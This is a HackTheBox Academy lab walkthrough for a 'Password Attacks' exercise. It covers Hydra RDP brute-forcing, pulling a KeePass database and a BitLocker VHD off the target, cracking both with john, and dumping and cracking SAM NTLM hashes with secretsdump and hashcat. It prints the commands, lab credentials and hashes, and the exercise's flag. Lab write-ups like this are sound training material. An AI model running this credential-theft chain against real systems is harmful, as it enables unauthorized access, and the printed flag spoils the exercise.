Password Attacks Lab - Hard

ℹ️ Informations¶

🌐 Website: HackTheBox
📚 Module: Password Attacks
🔗 Link: Password Attacks Lab - Hard

❓Question¶

Examine the third target and submit the contents of flag.txt in C:\Users\Administrator\Desktop\ as the answer.

📋 Walkthrough¶

First, we run a Recon scan on the target to identify open ports and services.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ autonmap $target -t Recon        

Running a Recon scan on 10.129.59.220

Host is likely running Windows

---------------------Starting Port Scan-----------------------

PORT     STATE SERVICE
111/tcp  open  rpcbind
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
2049/tcp open  nfs
3389/tcp open  ms-wbt-server
5985/tcp open  wsman

---------------------Starting Script Scan-----------------------

PORT     STATE SERVICE       VERSION
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  nlockmgr      1-4 (RPC #100021)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-03-18T12:05:15+00:00; -1h00m03s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: WINSRV
|   NetBIOS_Domain_Name: WINSRV
|   NetBIOS_Computer_Name: WINSRV
|   DNS_Domain_Name: WINSRV
|   DNS_Computer_Name: WINSRV
|   Product_Version: 10.0.17763
|_  System_Time: 2025-03-18T12:05:07+00:00
| ssl-cert: Subject: commonName=WINSRV
| Not valid before: 2025-03-17T11:44:15
|_Not valid after:  2025-09-16T11:44:15
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1h00m03s, deviation: 0s, median: -1h00m03s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-03-18T12:05:08
|_  start_date: N/A

There is a website, but it returns "Not Found". We proceed to brute-force the RDP password using Hydra.

──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ hydra -l johanna rdp://$target -P mut.txt   
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-18 13:20:25
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 94044 login tries (l:1/p:94044), ~23511 tries per task
[DATA] attacking rdp://10.129.59.220:3389/
[ERROR] freerdp: The connection failed to establish.
[3389][rdp] account on 10.129.59.220 might be valid but account not active for remote desktop: login: johanna password: 00000001, continuing attacking the account.
[ERROR] freerdp: The connection failed to establish.
[ERROR] freerdp: The connection failed to establish.
[ERROR] freerdp: The connection failed to establish.
<SNIP>
[3389][rdp] account on 10.129.59.220 might be valid but account not active for remote desktop: login: johanna password: 1231232001, continuing attacking the account.

[3389][rdp] host: 10.129.59.220   login: johanna   password: 1231234!
[ERROR] freerdp: The connection failed to establish.
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-18 13:26:22

We successfully find the RDP credentials: johanna:1231234!.

Next, we find a KeePass file in the documents. We use an upload server to transfer the file to our attacking machine.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ uploadserver  
File upload available at /upload
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

We crack the KeePass file using keepass2john and john.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ keepass2john Logins.kdbx > hash 

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ john -w=mut.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Qwerty7!         (Logins)     
1g 0:00:00:51 DONE (2025-03-18 14:07) 0.01950g/s 1426p/s 1426c/s 1426C/s qwerty4!..Qwerty98
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Qwerty7!         (Logins)     
1g 0:00:00:51 DONE (2025-03-18 14:07) 0.01950g/s 1426p/s 1426c/s 1426C/s qwerty4!..Qwerty98
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

In keepass we find david:gRzX7YbeTcDG7

In his Documents/David we find a bitlocked backup

-a----        2/11/2022   4:16 AM      136315392 Backup.vhd

PS C:\Users\david\Documents\David> cp .\Backup.vhd C:\Users\Public\Downloads
PS C:\Users\david\Documents\David>

upload it on our server

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ bitlocker2john -i Backup.vhd > hashesh

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ grep "bitlocker\$0" hashesh > hash

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ cat hash               
$bitlocker$0$16$60d83def3e335699830cc42793dae6e5$1048576$12$80b20a04341fd80103000000$60$ae149c9c17975483390d2afb7ff75c3e3380733976fa7d02bb29caebece6076c3c29096fc341a916c79b0db656a1f28e9f186e8b201c38653f64443a

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ john -w=mut.txt hash
Note: This format may emit false positives, so it will keep trying even after finding a possible candidate.
Using default input encoding: UTF-8
Loaded 1 password hash (BitLocker, BitLocker [SHA-256 AES 32/64])
Cost 1 (iteration count) is 1048576 for all loaded hashes
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
123456789!       (?)

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ sudo qemu-nbd --connect=/dev/nbd0 Backup2.vhd -f vpc 

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ sudo fdisk -l /dev/nbd0                              
Disk /dev/nbd0: 130 MiB, 136314880 bytes, 266240 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: gpt
Disk identifier: E0E57133-41D5-4D8C-B375-F2A10AD403B0

Device      Start    End Sectors  Size Type
/dev/nbd0p1    34  32767   32734   16M Microsoft reserved
/dev/nbd0p2 32768 262143  229376  112M Microsoft basic data

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ sudo dislocker -V /dev/nbd0p2 -u123456789! -- ~/bitlocker_mount

┌──(kali㉿kali)-[~]
└─$ sudo mount -o loop ~/bitlocker_mount/dislocker-file ~/bitlocker_unlocked

┌──(kali㉿kali)-[~]
└─$ cd bitlocker_unlocked 

┌──(kali㉿kali)-[~/bitlocker_unlocked]
└─$ ls
'$RECYCLE.BIN'   SAM   SYSTEM  'System Volume Information'

┌──(kali㉿kali)-[~/bitlocker_unlocked]
└─$ impacket-secretsdump -sam SAM -system SYSTEM LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x62649a98dea282e3c3df04cc5fe4c130
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e53d4d912d96874e83429886c7bf22a1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:9e73cc8353847cfce7b5f88061103b43:::
sshd:1000:aad3b435b51404eeaad3b435b51404ee:6ba6aae01bae3868d8bf31421d586153:::
david:1009:aad3b435b51404eeaad3b435b51404ee:b20d19ca5d5504a0c9ff7666fbe3ada5:::
johanna:1010:aad3b435b51404eeaad3b435b51404ee:0b8df7c13384227c017efc6db3913374:::
[*] Cleaning up...

┌──(kali㉿kali)-[~/bitlocker_unlocked]
└─$ hashcat -m 1000 hash ~/Desktop/HTB/Academy/mut.txt       
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-13th Gen Intel(R) Core(TM) i7-13700KF, 14915/29894 MB (4096 MB allocatable), 24MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 6 MB

Dictionary cache built:
* Filename..: /home/kali/Desktop/HTB/Academy/mut.txt
* Passwords.: 94044
* Bytes.....: 1034072
* Keyspace..: 94044
* Runtime...: 0 secs

e53d4d912d96874e83429886c7bf22a1:Liverp00l8!

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1000 (NTLM)
Hash.Target......: e53d4d912d96874e83429886c7bf22a1
Time.Started.....: Tue Mar 18 14:55:46 2025 (0 secs)
Time.Estimated...: Tue Mar 18 14:55:46 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/home/kali/Desktop/HTB/Academy/mut.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 25585.0 kH/s (0.13ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 73728/94044 (78.40%)
Rejected.........: 0/73728 (0.00%)
Restore.Point....: 49152/94044 (52.26%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: l0vely84! -> R0ckst@r93
Hardware.Mon.#1..: Temp: 36c Util:  5%

Started: Tue Mar 18 14:55:45 2025
Stopped: Tue Mar 18 14:55:48 2025

Flag is in Admin desktop

Answer

HTB{PWcr4ck1ngokokok}